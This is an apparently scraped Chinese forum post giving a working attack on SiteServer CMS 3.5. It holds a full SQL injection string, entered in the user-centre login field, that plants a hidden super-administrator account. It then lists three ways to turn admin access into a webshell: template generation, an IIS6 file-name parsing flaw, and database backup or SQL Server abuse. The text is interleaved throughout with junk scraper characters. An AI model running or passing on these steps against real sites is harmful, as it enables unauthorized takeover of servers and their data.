经测试秒杀最新的3.5版
- j) m/ S2 J! U* Q8 Y# S2 E7 ^: O0 x9 a; R; t
stieserver官网:www.siteserver.cn
( D; j3 F9 X8 _' |. c1 g T
) O$ r8 G- h1 X( ? ! D: B2 f1 h p! Y) O
1 P( Z1 j4 z7 F
EXP:
+ S! @9 W3 `& Z
& C h% ]! T. b. `直接访问UserCenter/login.aspx
' o- M, P/ X. f" i k
% N1 M: j; G* t9 s8 c/ _- d . {! R% Z% |4 n" O
4 P0 w+ t6 L7 \) S5 E用户名处输入:
: {1 l/ s& J2 W0 Z3 \1 B8 e }- o9 m4 e: b0 M4 F0 f
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
+ B) `# x* U" d" e) c* V
: y$ s x2 q( i# H' y0 B$ R
9 L. D5 e0 o9 x: t/ ]! K" G4 L2 _7 }9 }# M
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。' D0 ?2 o" I4 ^7 P2 _ f! ?
+ ?. p) m* Z6 j& V' E$ H1 k
1 X; A. D% L+ N; Q$ E+ x
! f# f0 q0 N1 C' \" r9 E5 \之后再访问后台SiteServer/login.aspx用插入的用户登陆
+ n6 Q" p0 }8 A$ D
7 \* Y! z2 F6 X) [) ?! L3 K5 O
5 l8 z" V9 p/ ^' x! f* r. ?/ ^2 a' {* T% N4 z
后台拿webshell的三种方法:1 z+ @7 G" `: Y. w L; |
! X/ }) a! d6 m" y一、
% p" n$ d; o( G% h% K7 k$ ~
8 X+ G/ {+ o0 V! T站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx6 `8 ^7 h1 x E+ j6 \! L( D6 ^# s; o/ j" W
3 a7 Q# ~& M! l7 x) `
二、: l% {6 C5 d/ u A( t M! K
: D- r7 ]* N! \0 x8 r" l) T- w1 }; V2 ?成员权限-》添加用户-》用户名为:1.asp
- m4 K' }8 _7 ]: ?4 Q+ J: d# o2 @. S) y
http://127.0.0.1/usercenter/, Y/ u: m/ C; ~) u) j" Y; ~
) Q* @ c, i, |6 \- A
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
6 A, y0 i! A7 _0 D7 \5 d% p
/ l& x$ g* @- l7 _$ ]" J9 |7 e8 d(ps:后台添加用户时不会验证是否含有非法字符)" |& X( v( q: T
6 D- l# E% V a9 X
三、$ p4 e; w1 c5 V3 @+ b2 o
% _( ` u+ o4 ^. i) E+ G
系统工具-》实用工具-》机器参数查看
. a5 ~4 h! o0 [- ~. ?7 H( L0 c可以看到数据库类型、名称,WEB路径
9 O* C: o# i3 o$ E
. ~) k8 i( N3 Y! i7 `* }- H) x系统工具-》数据库工具-》SQL语句查询& |0 H3 ]" N3 _
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
8 G9 n8 g f6 O! Q0 L9 y
. R$ l+ f: ]& ~3 k; r' ^ |